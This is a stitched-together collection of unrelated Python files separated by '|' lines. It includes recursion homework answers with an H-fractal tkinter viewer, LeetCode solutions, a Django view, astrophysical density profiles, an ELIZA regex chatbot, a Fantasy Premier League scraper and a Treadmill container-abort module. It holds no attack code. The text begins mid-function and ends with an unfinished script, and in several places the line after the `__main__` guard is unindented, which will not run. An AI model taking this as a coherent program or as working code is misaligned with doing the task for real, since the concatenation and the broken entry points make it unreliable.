    BUG FIX: the original immediately overwrote the `n` parameter with a
    hard-coded 20, so the requested size was silently ignored.
    """
    series_expansions = [d(y).series(y, n)]
    series_expansions += [(d(y) * (h(y) ** k)).series(y, n) for k in range(1, n)]

    def mk_element(i, j):
        # Coefficient of y^i in column j's truncated expansion (0 if absent).
        expansion = series_expansions[j].truncate()
        coefficients = expansion.coefficients(y, sparse=False)
        print((i, j), expansion)  # debug trace kept from the original
        return coefficients[i] if i < len(coefficients) else 0

    return matrix(n, mk_element)
|
########################################
# Name: Joyce Moon #
# Andrew ID: seojinm #
# Section: B #
########################################
####################
# Question 0 #
# Study the notes! #
####################
'''
Carefully go over the recursion examples seen in class and recitation.
Make sure that you are able to reproduce the solutions by yourself.
This will help you a lot with the homework and the exam!!!
'''
##################################
# Question 1 #
# Reasoning about recursive code #
##################################
# Do "Reasoning About (Recursive) Code" from
# http://www.kosbie.net/cmu/fall-11/15-112/handouts/hw5.html#Reasoning
# Put your answers below in a triple-quoted string.
# def f(n):
# # assume n is a non-negative integer
# if (n < 10):
# return 1
# else:
# return 1 + f(n/10)
# """Returns the number of decimal digits of n."""
# def f(a):
# # assume a is a list of strings
# if (len(a) == 0):
# return ""
# else:
# x = f(a[1:])
# if (len(x) > len(a[0])):
# return x
# else:
# return a[0]
# """Returns the longest string in the list, preferring the earliest one
# when several share the maximal length (ties go to the string closer to
# the front); returns "" for an empty list."""
# def f(a):
# # assume a is a list of integers
# if (len(a) == 0):
# return 0
# elif (len(a) == 1):
# return (a[0] % 2)
# else:
# i = len(a)//2
# return f(a[:i]) + f(a[i:])
# """returns the number of odd numbers"""
# def f(n):
# # assume n is a non-negative integer
# if (n == 0):
# return 1
# else:
# return 2*f(n-1)
# """returns 2 to n power"""
# def f(n):
# # assume n is a non-negative integer
# if (n == 0):
# return 0
# else:
# return f(n-1) + 2*n - 1
# """return n square"""
# Hint: you may want to try this function with a few sample values.
# The answer should quickly become apparent, though you may wish to
# think about why the answer is in fact what it is.
############################
# Question 2 #
# No loops, only recursion #
############################
# Complete the functions below. Your solutions must be completely recursive.
# In particular, you will not receive any points if you use a "for" loop
# or a "while" loop.
'''
Write the function interleave(s1, s2) that takes two strings, s1 and s2,
and interleaves their characters starting with the first character in s1.
For example, interleave('pto', 'yhn') would return the string "python".
If one string is longer than the other, concatenate the rest of the
remaining string onto the end of the new string.
For example, ('a#', 'cD!f2') would return the string "ac#D!f2".
'''
def interleave(s1, s2):
    """Recursively interleave s1 and s2 starting with s1[0]; once either
    string runs out, the remainder of the other is appended whole."""
    if not s1:
        return s2
    if not s2:
        return s1
    return s1[0] + s2[0] + interleave(s1[1:], s2[1:])
'''
This function takes an integer n as input. It returns a string of the form
"1 1 2 1 2 3 1 2 3 4 1 2 3 4 5 ...... 1 2 3 4 5 6 7 8...n"
For example, if n is 4, it should return "1 1 2 1 2 3 1 2 3 4".
'''
def foo(n):
    """Return "1 1 2 1 2 3 ... 1 2 ... n": the runs "1..k" for k = 1..n."""
    if n == 1:
        return "1"
    # Prefix with the result for n-1, then append this level's run "1 .. n".
    return foo(n - 1) + " " + fooHelper(n, 1)


def fooHelper(n, s):
    """Return the space-separated run "s s+1 ... n"."""
    if s == n:
        return str(s)
    return str(s) + " " + fooHelper(n, s + 1)
'''
In class we saw an example of a non-destructive reverse function.
Write the same function, but this time make it destructive.
'''
def reverse(L):
    """Destructively reverse L: pops both ends off the caller's list and
    returns a new list with the elements in reverse order."""
    if len(L) < 2:
        return L
    tail = L.pop(-1)
    head = L.pop(0)
    return [tail] + reverse(L) + [head]
'''
The function removeDuplicates(s) takes a string s as input.
If there is any character that repeats itself consecutively,
it deletes the repeated copies. For example, if the input is "abccdeeef",
the function returns "abcdef".
'''
def removeDuplicates(s):
    """Collapse consecutive repeated characters: "abccdeeef" -> "abcdef"."""
    if len(s) < 2:
        return s
    rest = removeDuplicates(s[1:])
    # Keep s[0] only when it differs from the character that follows it.
    return rest if s[0] == s[1] else s[0] + rest
'''
Write the recursive function flatten(L), which takes a list
which may contain lists (which themselves may contain lists, and so on),
and returns a single list (which does not contain any other lists)
which contains each of the non-lists, in order, from the original list.
This is called flattening the list. For example:
flatten([1,[2]]) returns [1,2]
flatten([1,2,[3,[4,5],6],7]) returns [1,2,3,4,5,6,7]
flatten(['wow', [2,[[]]], [True]]) returns ['wow', 2, True]
flatten([]) returns []
flatten([[]]) returns []
flatten(3) returns 3 (not a list)
'''
def flatten(L):
    """Flatten arbitrarily nested lists into one flat list, preserving order.

    Per the spec above, a non-list argument is returned as-is
    (flatten(3) == 3).

    Fix: the original raised TypeError on non-list input, because it went
    straight to L[0] after the empty-list check.
    """
    if not isinstance(L, list):
        return L
    if not L:
        return []
    first, rest = L[0], flatten(L[1:])
    if isinstance(first, list):
        return flatten(first) + rest
    return [first] + rest
'''
Write the function isPerfectNumber that takes a possibly-negative integer n
and returns True if it is a perfect number and False otherwise,
where a number is perfect if it is the sum of its positive divisors less than itself.
We'll assume 0 is perfect.
The next perfect number is 6 because 6 = 1 + 2 + 3.
The next one is 28 because 28 = 1 + 2 + 4 + 7 + 14.
The next one is 496, then 8128, ...
'''
import math
# A number is perfect when it equals the sum of its positive divisors
# strictly less than itself; 0 is treated as perfect by the spec above.
def isPerfectNumber(n):
    """Return True iff n is a perfect number (0 counts as perfect).

    Fix: the original recursed forever for n <= 1 (including negatives),
    because the helper's stop condition `m == n - 1` was never reached.
    """
    if n <= 0:
        return n == 0  # 0 is perfect by convention; negatives never are
    if n == 1:
        return False   # 1 has no positive divisors smaller than itself
    return n == isPNhelper(n)


# Recursively sum the divisors m of n with 1 <= m < n.
def isPNhelper(n, m=1):
    if m >= n:
        return 0
    if n % m != 0:
        return isPNhelper(n, m + 1)
    return m + isPNhelper(n, m + 1)
################
# Question 3 #
# Backtracking #
################
'''
Modify the solve(n, m, constraints) function seen in class
(for the nQueens problem) so that instead of returning a solution,
it returns the total number of solutions.'''
## basic code from website
def nQueens(n):
    """Return the total number of solutions to the n-queens problem.

    Fixes over the class version it was adapted from:
    - removed the dead early-return code left over from the
      find-one-solution variant (solve always returned None here, so the
      `if (solution != None)` branch could never fire);
    - dropped the useless `qcol == col` test in isLegal (qcol < col always).
    """
    queenRow = [-1] * n  # queenRow[c] = row of the queen in column c, or -1
    count = [0]          # boxed int so the nested function can mutate it

    def isLegal(row, col):
        # Legal iff no queen in an earlier column attacks (row, col):
        # same row or either diagonal.
        for qcol in range(col):
            qrow = queenRow[qcol]
            if (qrow == row or
                    qrow + qcol == row + col or
                    qrow - qcol == row - col):
                return False
        return True

    def solve(col):
        # Base case: every column holds a queen -> one complete solution.
        if col == n:
            count[0] += 1
            return
        # Try each row in this column, recurse, then backtrack.
        for row in range(n):
            if isLegal(row, col):
                queenRow[col] = row
                solve(col + 1)
                queenRow[col] = -1  # pick the queen back up

    solve(0)
    return count[0]
'''
Background: we will say that a board is a square 2d list of integers.
As with mazes, a solution is a path from the left-top to the right-bottom,
only here we will only allow moves that are up, down, left and right (no diagonals).
A solution is an "increasing path" (a coined term) if each value
on the solution path is strictly larger than the one before it on that path.
Consider this board:
board = [[ 1, 3, 2, 4 ],
[ 0, 4, 0, 3 ],
[ 5, 6, 8, 9 ],
[ 0, 7, 8, 9 ]]
This board has exactly one increasing path:
right to 3, down to 4, down to 6, down to 7, right to 8, right to 9.
With this in mind, write the function increasingPathCount(board)
that takes such a board and returns the number of increasing paths
running from the left-top to right-bottom in that board.
For the example board above, your function would return 1.
Similarly, consider this board:
board = [ [3, 5],
[4, 7] ]
For this board, your function would return 2:
those paths being right,down and also down,right.
Your solution must be recursive (but you can use iteration too).
Also, you cannot simply explore every possible path to solve this problem.
'''
def increasingPathCount(board):
    """Count strictly-increasing up/down/left/right paths from the top-left
    cell to the bottom-right cell of a square board."""
    n = len(board)
    total = [0]  # boxed counter mutated by the nested search

    def explore(r, c):
        # Reached the target corner: one more increasing path found.
        if (r, c) == (n - 1, n - 1):
            total[0] += 1
            return
        here = board[r][c]
        # Step to any in-bounds neighbour holding a strictly larger value.
        for nr, nc in ((r, c + 1), (r, c - 1), (r - 1, c), (r + 1, c)):
            if 0 <= nr < n and 0 <= nc < n and board[nr][nc] > here:
                explore(nr, nc)

    explore(0, 0)
    return total[0]
##############
# Question 4 #
# H-fractal #
##############
'''
Do Question 6 from here: https://www.cs.cmu.edu/~112/notes/hw9.html
Please follow the directions given in the hint:
"The H that is drawn right in the middle should always have the same size
(the width and height should be half the window width and height).
At each level, we draw new H's with half the dimensions of the previous level.
This is why the window size never has to change
(since 1 + 1/2 + 1/4 + 1/8 + ... = 2)."
The pictures in mathworld.wolfram.com are misleading!
At each level, the largest H in the middle should have the same size.
'''
from tkinter import *
####################################
# customize these functions
####################################
def init(data):
    """Initialise the model: start with only the central H (depth 0)."""
    data.level = 0
#return a list of 4 tuples of end points in the shape H
def getPoints(data, level, point):
    """Return the four tips of the H centred at `point` for this level:
    [top-left, bottom-left, top-right, bottom-right].

    Each level's H has half the dimensions of the previous one, so the
    half-extents shrink by a factor of two per level.
    """
    cx, cy = point
    half_w = int((data.width * 0.5 ** (level + 1)) / 2)
    half_h = int((data.height * 0.5 ** (level + 1)) / 2)
    return [(cx - half_w, cy - half_h), (cx - half_w, cy + half_h),
            (cx + half_w, cy - half_h), (cx + half_w, cy + half_h)]
def mousePressed(event, data):
    # use event.x and event.y
    # Mouse input is not used by the H-fractal viewer; levels change via keys.
    pass
#increase and decrease the level depending on the key press
def keyPressed(event, data):
    """Up arrow deepens the fractal one level; Down arrow backs off one
    level, never going below 0."""
    if event.keysym == "Up":
        data.level += 1
    elif event.keysym == "Down" and data.level > 0:
        data.level -= 1
def timerFired(data):
    # No animation: the fractal only changes (and redraws) on key events.
    pass
######draw functions#######
def redrawAll(canvas, data):
    """Kick off the recursive H drawing from the centre of the window."""
    centre = (data.width / 2, data.height / 2)
    redrawAll2(canvas, data, centre)
#recursion draw
def redrawAll2(canvas, data, point=(-1, -1), level=0, points=None):
    """Draw the H centred at `point`, then recurse on its four tips until
    data.level is reached.

    Fixes: the original used a mutable default argument (points=[]) and the
    parameter was dead anyway -- it was unconditionally overwritten and the
    value threaded into the recursive call was never read. The parameter is
    kept (defaulting to None) only for signature compatibility.
    """
    tips = getPoints(data, level, point)
    drawHelper(canvas, data, level, tips)
    if level == data.level:
        return
    for tip in tips:
        redrawAll2(canvas, data, tip, level + 1)
#draw H shape
def drawHelper(canvas, data, level, points):
    """Draw one H: two blue vertical strokes (left pair, right pair of
    `points`) joined by a red horizontal crossbar at mid-height."""
    for idx in (0, 2):
        canvas.create_line(points[idx], points[idx + 1], fill="blue")
    mid_y = int((points[0][1] + points[1][1]) / 2)
    canvas.create_line(points[0][0], mid_y, points[2][0], mid_y, fill="red")
####################################
# use the run function as-is
####################################
def run(width=300, height=300):
    """Standard tkinter animation scaffold: wires the mousePressed /
    keyPressed / timerFired / redrawAll handlers above to a canvas of the
    given size and starts the event loop (blocks until the window closes)."""
    def redrawAllWrapper(canvas, data):
        canvas.delete(ALL)
        redrawAll(canvas, data)
        canvas.update()
    def mousePressedWrapper(event, canvas, data):
        mousePressed(event, data)
        redrawAllWrapper(canvas, data)
    def keyPressedWrapper(event, canvas, data):
        keyPressed(event, data)
        redrawAllWrapper(canvas, data)
    def timerFiredWrapper(canvas, data):
        timerFired(data)
        redrawAllWrapper(canvas, data)
        # pause, then call timerFired again
        canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
    # Set up data and call init
    class Struct(object): pass
    data = Struct()
    data.width = width
    data.height = height
    data.timerDelay = 100 # milliseconds
    init(data)
    # create the root and the canvas
    root = Tk()
    canvas = Canvas(root, width=data.width, height=data.height)
    canvas.pack()
    # set up events
    root.bind("<Button-1>", lambda event:
    mousePressedWrapper(event, canvas, data))
    root.bind("<Key>", lambda event:
    keyPressedWrapper(event, canvas, data))
    timerFiredWrapper(canvas, data)
    # and launch the app
    root.mainloop()  # blocks until window is closed
    print("bye!")
def Hfractal():
    """Launch the interactive H-fractal viewer in a 600x600 window."""
    run(width=600, height=600)
####################################
# test cases
####################################
# Simple assertion-based smoke tests for the recursive exercises above;
# testAll() runs every suite in order and prints progress.
def testInterleave():
    print("testing interleave...")
    assert(interleave('a#', 'cD!f2')=="ac#D!f2")
    assert(interleave('abc', '')=="abc")
    print("passed")
def testFoo():
    print("testing foo...")
    assert(foo(4)=="1 1 2 1 2 3 1 2 3 4")
    assert(foo(3)=="1 1 2 1 2 3")
    print("passed")
def testReverse():
    print("testing reverse...")
    assert(reverse([1,2,3])==[3,2,1])
    assert(reverse([3,2,1])==[1,2,3])
    print("passed")
def testRemoveDuplicates():
    print("testing removeDuplicates...")
    assert(removeDuplicates("111")=="1")
    assert(removeDuplicates("1112")=="12")
    print("passed")
def testFlatten():
    print("testing flatten...")
    assert(flatten([[]])==[])
    assert(flatten([1,2,[3,[4,5],6],7])==[1,2,3,4,5,6,7])
    print("passed")
def testIsPerfectNumber():
    print("testing isPerfectNumber...")
    assert(isPerfectNumber(6))
    assert(not isPerfectNumber(7))
    print("passed")
def testNQueens():
    print("testing nQueens...")
    assert(nQueens(1)==1)
    assert(nQueens(2)==0)
    assert(nQueens(4)==2)
    print("passed")
def testIncreasingPathCount():
    print("testing increasingPathCount...")
    assert(increasingPathCount([ [3, 5],[4, 7] ])==2)
    assert(increasingPathCount([[ 1, 3, 2, 4 ],
    [ 0, 4, 0, 3 ],
    [ 5, 6, 8, 9 ],
    [ 0, 7, 8, 9 ]])==1)
    print("passed")
def testAll():
    # Run every suite; any failure raises AssertionError immediately.
    testInterleave()
    testFoo()
    testReverse()
    testRemoveDuplicates()
    testFlatten()
    testIsPerfectNumber()
    testNQueens()
    testIncreasingPathCount()
|
#!/bin/env python
# coding:utf-8
|
class Solution:
    def minimumTotal(self, triangle: 'List[List[int]]') -> int:
        """
        https://leetcode.com/problems/triangle/
        Bottom-up DP: dp[j] holds the minimum path sum from the current row
        down to the bottom when entering at column j; work upward from the
        last row so only one 1-D buffer is needed.

        Fixes: removed the stray debug print(); dp no longer aliases
        triangle's last row (it is copied); the annotation is quoted so the
        method does not require `List` to be imported at definition time.
        """
        dp = list(triangle[-1])  # copy so triangle is never mutated/aliased
        for i in range(len(triangle) - 2, -1, -1):
            for j in range(len(triangle[i])):
                dp[j] = triangle[i][j] + min(dp[j], dp[j + 1])
        return dp[0]
from django.views.generic import TemplateView
from .models import TextAnimate
# Create your views here.
class HomeView(TemplateView):
    # Renders index.html with every TextAnimate row plus a precomputed count.
    template_name = "index.html"
    def get_context_data(self, **kwargs):
        """Extend the template context with all TextAnimate objects and
        their count (len() evaluates the queryset once here)."""
        context = super().get_context_data(**kwargs)
        text_animate = TextAnimate.objects.all()
        context["text_animate"] = text_animate
        context["text_animatelen"] = len(text_animate)
        return context
|
from __future__ import division
from __future__ import absolute_import

import math

import scipy as sp
speed_of_light = 299792.458 # Speed of light in km/s
class plummer:
    """Plummer sphere with scale radius `a` and total luminosity `lum`."""

    def __init__(self, a, lum):
        self.a = a      # scale radius
        self.lum = lum  # total luminosity

    def nu(self, x):
        """Normalised 3D density profile evaluated at radius x.

        Fix: uses math.pi -- the `scipy.pi` alias was deprecated and has
        been removed from modern SciPy (>= 1.12).
        """
        a = self.a
        return (3 / (4 * math.pi * a ** 3)) * (1 + (x / a) ** 2) ** (-5 / 2)

    def j(self, x):
        """Luminosity density at radius x: lum * nu(x) (same profile)."""
        return self.lum * self.nu(x)
class hernquist:
    """Hernquist profile with scale radius `a` and total luminosity `lum`."""

    def __init__(self, a, lum):
        self.a = a      # scale radius
        self.lum = lum  # total luminosity

    def nu(self, x):
        """Normalised 3D density profile at radius x (diverges as x -> 0).

        Fix: uses math.pi -- the `scipy.pi` alias was deprecated and has
        been removed from modern SciPy (>= 1.12).
        """
        a = self.a
        return (1 / (2 * math.pi)) * (a / x) / (a + x) ** 3

    def j(self, x):
        """Luminosity density at radius x: lum * nu(x) (same profile)."""
        return self.lum * self.nu(x)
|
# =============================================================================
# #Programming Assignment 1 - Eliza Chatbot
#
# #Team Members - Abhishek Shambhu , Jeyamurugan Krishnakumar & Shreyans Singh
#
# #Team Name - Team Bots
#
# #Description - We started by importing the regular expression(re), random, datetime and time library.
# Then we added the dictionary for most used nouns(Noun_reflections) and pronouns(Pronoun_reflections)
# which would help us in word spotting from the questions and transform it according to the answers.
# Then we added the Expressions as in Regular Expressions - using the re library to match the
# questions or statements given by user as input and then some random answers(using the random
# library)
#
# #What our Chatbot can do? - We have tried to implement the chatbot using pattern matching techniques -
# Regular Expressions or Regexes which allow the chatbot to converse with a human by following the rules
# and directions of the script.
# This chatbot, in specific, can engage in a conversation based on certain patterns.
# Although this chatbot does not explicitly recognize complex word matching or minimal context, it attempts
# to present itself in a humane manner since only regexes were used.
#
#
# =============================================================================
#Importing Regular expressions
import re
#Importing random module to get random responses
import random
#Importing system datatime to greet the user based on time
import datetime
#importing time for time.sleep() functionality so that the responses of ELIZA looks real
import time
#Dictionary where we are replacing some noun words in the user input sentence with its corresponding pair(Word Spotting)
# Verb -> noun/gerund mapping used when reflecting the user's words back
# ("I resent X" -> "... your resentment ..."). Keys are matched after
# lower-casing, so entries must be lower-case.
Noun_dict = {
    "crave": "craving",
    "avoid": "avoiding",
    "celebrate": "celebration",
    "resent": "resentment",
    "feel": "feeling",
    "forgive": "forgiveness",
    "smoke": "smoking",
    "arrange": "arrangement",
    "write": "writing",
    "prefer": "preference",
}
#Dictionary where we are replacing most common pronoun words in the user input sentence with its corresponding pair(Word Spotting)
# First-person <-> second-person reflection ("I am sad" -> "you are sad").
# Keys are matched after lower-casing, so entries must be lower-case.
Pronoun_dict = {
    "am": "are",
    "was": "were",
    "i": "you",
    "i'd": "you would",
    "i've": "you have",
    "i'll": "you will",
    "my": "your",
    "are": "am",
    "you've": "I have",
    "you'll": "I will",
    "your": "my",
    "yours": "mine",
    "you": "me",
    "me": "you"
}
#Expressions list containing a two element list i.e. key value pair.
#The first is the regular expression and the second is a list of responses and
#any of the possible response is selected any shown as output by ELIZA
# Each entry pairs a regex with a list of candidate responses; the first
# matching pattern wins and one response is picked at random. "{0}"
# placeholders are filled with the (reflected) captured text.
# Fixes: corrected user-facing typos "definetely" -> "definitely",
# "upto" -> "up to", "abut" -> "about".
Expressions = [
    # I want ...
    [r'(?i)I want (.*)',
     ["Do you really want {0}?",
      "Will it make you happy if you get {0}?",
      "Why do you need {0}?"]],
    # Do you ...?
    [r'(?i)Do you ([^\?]*)\??',
     ["Yes, I do.",
      "No, I do not {0} because I am a chatbot.",
      "Kinda."]],
    # I need ...
    [r'(?i)I need (.*)',
     ["Will you be fine if you don't get {0}?",
      "Will it make you happy if you get {0}?",
      "Why do you need {0}?"]],
    # I don't/dont need ...
    [r'(?i)I don\'?t need (.*)',
     ["Are you sure you do not need {0}?",
      "But I really think you need {0}.",
      "Do you want my help in getting you {0}?"]],
    # Yes ...
    [r'(?i)(Y|y)es(.*)',
     ["I am really excited to hear that.",
      "Tell me more about it?"]],
    # No ...
    [r'(?i)(N|n)o(.*)',
     ["Don't be so negative.",
      "You should definitely give it a try!"]],
    # ...tell...joke
    [r'(?i)tell(.*)joke(.*)',
     ["Friday is my second favourite F word.",
      "If a stranger offers you a piece of candy..take two!!"]],
    # I am...
    [r'(?i)I am (.*)',
     ["Are you proud that you are {0}?",
      "Are you happy to be {0}?",
      "I am not surprised by that!"]],
    # I m...
    [r'(?i)I\'?m(.*)',
     ["How do you feel being {0}?",
      "For how long have you been {0}?",
      "Why do you think you are {0}?"]],
    # Are you...
    [r'(?i)Are you ([^\?]*)\??',
     ["What would happen if I was not {0}?",
      "I am not sure whether I am {0}. What do you think?"]],
    # I think I...
    [r'(?i)I think I(.*)',
     ["Why don't you tell me more about your {0}?"]],
    # I think I'm...
    [r'(?i)I think I\'m(.*)',
     ["Why don't you tell me more about your {0}?"]],
    # ...sorry...
    [r'(.*)sorry(.*)',
     ["I am just a chatbot. I do not require any apology.",
      "What feelings do you have when you apologize?",
      "There are many times when no apology is needed."]],
    # What...
    [r'(?i)What ([^\?]*)\??',
     ["Why do you ask that?",
      "Is this thing really important to you?",
      "What do you think?"]],
    # How...
    [r'(?i)How ([^\?]*)\??',
     ["I am not sure about that.",
      "Just believe in your instincts!",
      "Why do you think that?"]],
    # Because...
    [r'(?i)(b|B)ecause(.*)',
     ["Is this true?",
      "What else crosses your mind?"]],
    # ...I think ...
    [r'(?i)I think (.*)',
     ["Do you really believe so?",
      "Are you sure?"]],
    # ... family ...
    [r'(.*)family(.*)',
     ["Where does your family live?",
      "How many people are there in your family?"]],
    # Is it ...
    [r'(?i)Is it([^\?]*)\??',
     ["If it were {0}, what would you do?"]],
    # It is...
    [r'(?i)It is (.*)',
     ["You seem very certain.",
      "If I told you that it probably isn't {0}, what would you feel?"]],
    # Can you...
    [r'(?i)Can you ([^\?]*)\??',
     ["I am just a chatbot. I am not God!!",
      "What if I could {0}?",
      "Will it make you happy if I could {0}"]],
    # Can I...
    [r'(?i)Can I ([^\?]*)\??',
     ["I am not pushing you. It is all up to you if you want to {0}",
      "Do you think you could {0}?"]],
    # Question
    [r'(.*)\?',
     ["I believe you can answer this yourself",
      "Is it really necessary to answer this?",
      "I never thought about it"]],
    # Statement
    [r'(.*)',
     ["Can you please elaborate more?",
      "Ohh. I see. Does it make you feel happy?",
      "That is interesting!",
      "What do you mean?",
      "Try explaining more about it"]]
]
#The correspond_words function lower-cases the input and splits it into words.
#Then we loop over the words, checking each against the noun and pronoun dictionaries,
#and if a word is found in a dictionary we replace it with its mapped value.
def correspond_words(response_match):
    """Lower-case the captured text and swap each word for its reflected
    form (second-person pronouns, noun/gerund forms) so echoed replies read
    naturally; unknown words pass through unchanged."""
    swapped = []
    for original in response_match.lower().split():
        replacement = Pronoun_dict.get(original, original)
        # Noun reflections take precedence over pronoun reflections.
        if original in Noun_dict:
            replacement = Noun_dict[original]
        swapped.append(replacement)
    return ' '.join(swapped)
def process(user_input):
    """Return ELIZA's reply for `user_input`.

    Patterns in Expressions are tried in order; the first match wins and a
    random canned response for it is formatted with the reflected capture
    groups. The final catch-all pattern guarantees a reply.

    Fix: the original formatted with only the FIRST capture group (it
    returned from inside the groups loop), so multi-group patterns never
    saw their later groups.
    """
    for pattern, responses in Expressions:
        # Trailing punctuation is stripped so "I need help!" still matches.
        match = re.match(pattern, user_input.rstrip(".!"))
        if match:
            chosen = random.choice(responses)
            reflected = [correspond_words(group) for group in match.groups()]
            return chosen.format(*reflected)
#This is the main Eliza interface function
def elisa():
    """Main ELIZA REPL: ask for a name, greet by time of day, then loop
    reading user input and printing pattern-matched replies until an
    exit word is entered."""
    #Print function where Eliza introduces herself and asks for username
    print("ELIZA: Hi, I'm ELIZA a psychotherapist. What is your name?")
    #User entered input is taken in name_sentence variable
    name_sentence = input("USER: ")
    #time.sleep(secs) will pause the execution so that the chatbot's reply looks real
    time.sleep(2)
    #Here, i am splitting each word from input entered in a list
    sent_split = name_sentence.split()
    #Here, i am taking the last word into name as the user might enter
    #Ex. my name is abhishek or you can call me by abhishek
    #So, considering last word as name and taking that as input
    name = sent_split[-1]
    #Here, i wanted to greet the user based on the system time
    currentTime = datetime.datetime.now()
    times = currentTime.hour
    if 5 <= times < 12:
        greet = 'Good Morning.'
    elif 12 <= times < 16:
        greet = 'Good Afternoon.'
    elif 16 <= times < 20:
        greet = 'Good Evening.'
    else:
        greet = "It's night now."
    #Print function where it replies with name and greetings
    print(f"ELIZA: Hi {name}. {greet} What do you want to ask me today?")
    while True:
        # Any of these words ends the session.
        exit_list = ("goodbye","Goodbye","Bye","bye","See you later","quit","Quit","Exit","exit")
        user_input=input("USER: ")
        if user_input in exit_list:
            #If input entered is from any of the above list prints ending message and ends the conversation
            print("ELIZA: Have a nice day. Good bye Human!")
            break
        else:
            #time.sleep(secs) will pause the execution so that the chatbot's reply looks real
            time.sleep(2)
            #display matched response after processing based on input entered
            print("ELIZA: "+process(user_input))
if __name__ == "__main__":
elisa()
|
import pandas as pd
import requests
from collections import namedtuple
OVERALL_LEAGUE = 314
LEAGUE_API = 'https://fantasy.premierleague.com/api/leagues-classic/'
STANDINGS = '/standings/?page_standings='
NUM_MANAGERS = 500 # 10000
def parse_standings_page(standings_page):
    """Convert one standings API page into a list of namedtuple entries.

    Field names are taken from the keys of the first result row, so every
    row on the page is assumed to share the same schema.
    """
    Entry = namedtuple('Entry', standings_page['results'][0].keys())
    return [Entry._make(row.values()) for row in standings_page['results']]
def main():
    """Scrape the first NUM_MANAGERS entries of the overall FPL classic
    league page by page and write them to a CSV under ./data/."""
    url = LEAGUE_API + str(OVERALL_LEAGUE) + STANDINGS  # NOTE(review): unused
    page = 1
    overall_league_standings = requests.get(
        LEAGUE_API + str(OVERALL_LEAGUE) + STANDINGS + str(page)
    ).json()['standings']
    standings = []
    # Keep fetching while the API reports more pages and we still need rows.
    while overall_league_standings['has_next'] and len(standings) < NUM_MANAGERS:
        standings.extend(parse_standings_page(overall_league_standings))
        page += 1
        overall_league_standings = requests.get(
            LEAGUE_API + str(OVERALL_LEAGUE) + STANDINGS + str(page)
        ).json()['standings']
        if len(standings) % 100 == 0:
            # crude progress indicator
            print(len(standings))
    # The last fetched page was not consumed inside the loop body yet.
    standings.extend(parse_standings_page(overall_league_standings))
    standings = standings[:NUM_MANAGERS]
    standings = pd.DataFrame.from_records(standings, columns=standings[0]._asdict().keys())
    standings = standings.set_index('id')
    print(standings.head())
    standings.to_csv(f'./data/top-{NUM_MANAGERS}-managers.csv')
if __name__ == "__main__":
main()
|
"""Manages Treadmill applications lifecycle.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import os
import enum
from treadmill import appevents
from treadmill import fs
from treadmill import supervisor
from treadmill import utils
from treadmill.apptrace import events
_LOGGER = logging.getLogger(__name__)
ABORTED_UNKNOWN = {
'why': 'unknown',
'payload': None,
}
class AbortedReason(enum.Enum):
    """Container abort reasons.
    """
    # W0232: Class has no __init__ method
    # pylint: disable=W0232
    UNKNOWN = 'unknown'
    INVALID_TYPE = 'invalid_type'
    TICKETS = 'tickets'
    SCHEDULER = 'scheduler'
    PORTS = 'ports'
    PRESENCE = 'presence'
    IMAGE = 'image'
    PID1 = 'pid1'
    GMSA = 'GMSA'
    TIMEOUT = 'timeout'

    def description(self):
        """Return a human-readable description of this abort reason,
        falling back to the raw enum value when none is defined."""
        descriptions = {
            AbortedReason.INVALID_TYPE: 'invalid image type',
            AbortedReason.TICKETS: 'tickets could not be fetched',
            AbortedReason.SCHEDULER: 'scheduler error',
            AbortedReason.PORTS: 'ports could not be assigned',
            AbortedReason.IMAGE: 'could not use given image',
            AbortedReason.PID1: 'pid1 failed to start',
            AbortedReason.GMSA: 'host is not part of GMSA group'
        }
        return descriptions.get(self, self.value)
def abort(container_dir, why=None, payload=None):
    """Abort a running application.
    Called when some initialization failed in a running container.

    Writes the 'aborted' flag file, then brings the service down via the
    supervisor; the service directory is the parent of container_dir.
    """
    flag_aborted(container_dir, why, payload)
    container_dir = os.path.realpath(os.path.join(container_dir, '../'))
    supervisor.control_service(container_dir,
    supervisor.ServiceControlAction.down)
def _why_str(why):
    """Stringify an abort reason: AbortedReason members map to their enum
    value, anything else (including None) to str(why)."""
    return why.value if isinstance(why, AbortedReason) else str(why)
def flag_aborted(container_dir, why=None, payload=None):
    """Flags container as aborted.
    Called when aborting in failed run step.
    Consumed by cleanup script.

    Writes {'why': ..., 'payload': ...} as JSON to <container_dir>/aborted
    atomically (fs.write_safe), world-readable (0644).
    """
    if payload is not None:
        # Coerce arbitrary payloads so the flag file is always JSON-safe.
        payload = str(payload)
    fs.write_safe(
        os.path.join(container_dir, 'aborted'),
        lambda f: f.writelines(
            utils.json_genencode(
                {
                    'why': _why_str(why),
                    'payload': payload
                }
            )
        ),
        mode='w',
        permission=0o644
    )
def report_aborted(tm_env, instance, why=None, payload=None):
    """Report an aborted instance.
    Called when aborting after failed configure step or from cleanup.

    Posts an AbortedTraceEvent to the app-events directory so the trace
    pipeline records why the instance was aborted.
    """
    if payload is not None:
        # Coerce arbitrary payloads so the event is always serializable.
        payload = str(payload)
    appevents.post(
        tm_env.app_events_dir,
        events.AbortedTraceEvent(
            instanceid=instance,
            why=_why_str(why),
            payload=payload
        )
    )
|
#Conditionals
# NOTE: the bare string literals below act as informal commentary; they are
# no-op expression statements and produce no output when this script runs.
"Python conditionals are pretty much like java and javascript the operators are relatively the same and function in the same way"
"Python relies on indentation to to define scope so this must be used in python to start an if"
if 2>1:
    print("true")
"Elif is pretty much like else if in other languages meaning if the previous conditions werent true try this one"
a=33
b=33
if a>b:
    print("a is greater than b")
elif a==b:
    print("there the same")
"else statements are the same for anything that isnt caught"
"python allows for short hand if statements"
if a==b: print("The same again")
"Also yoyu can do a do a short hand if else [expression condtion else expression] you can do multipple of these in one line "
print("im right") if a==b else print("im wrong")
#These short hand expressions are known as ternary expressions
"In python instread of using && || you use and & or for logical operations"
"If's should not be empty but if you need it to be empty use the pass keyword"
if a<b:
    pass
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
    def checkAlmostEquivalent(self, word1: str, word2: str) -> bool:
        """Two words are almost equivalent iff every letter's frequency
        differs by at most 3 between them; check both directions so letters
        missing from either word are covered."""
        counts1, counts2 = Counter(word1), Counter(word2)
        return self._check(counts1, counts2) and self._check(counts2, counts1)

    def _check(self, counts1: dict, counts2: dict) -> bool:
        """Return False if any char of counts1 violates the threshold of 3
        against counts2 (absent chars must themselves occur <= 3 times)."""
        for char, count in counts1.items():
            if char in counts2:
                if abs(count - counts2[char]) > 3:
                    return False
            elif count > 3:
                return False
        return True
if __name__ == "__main__":
solution = Solution()
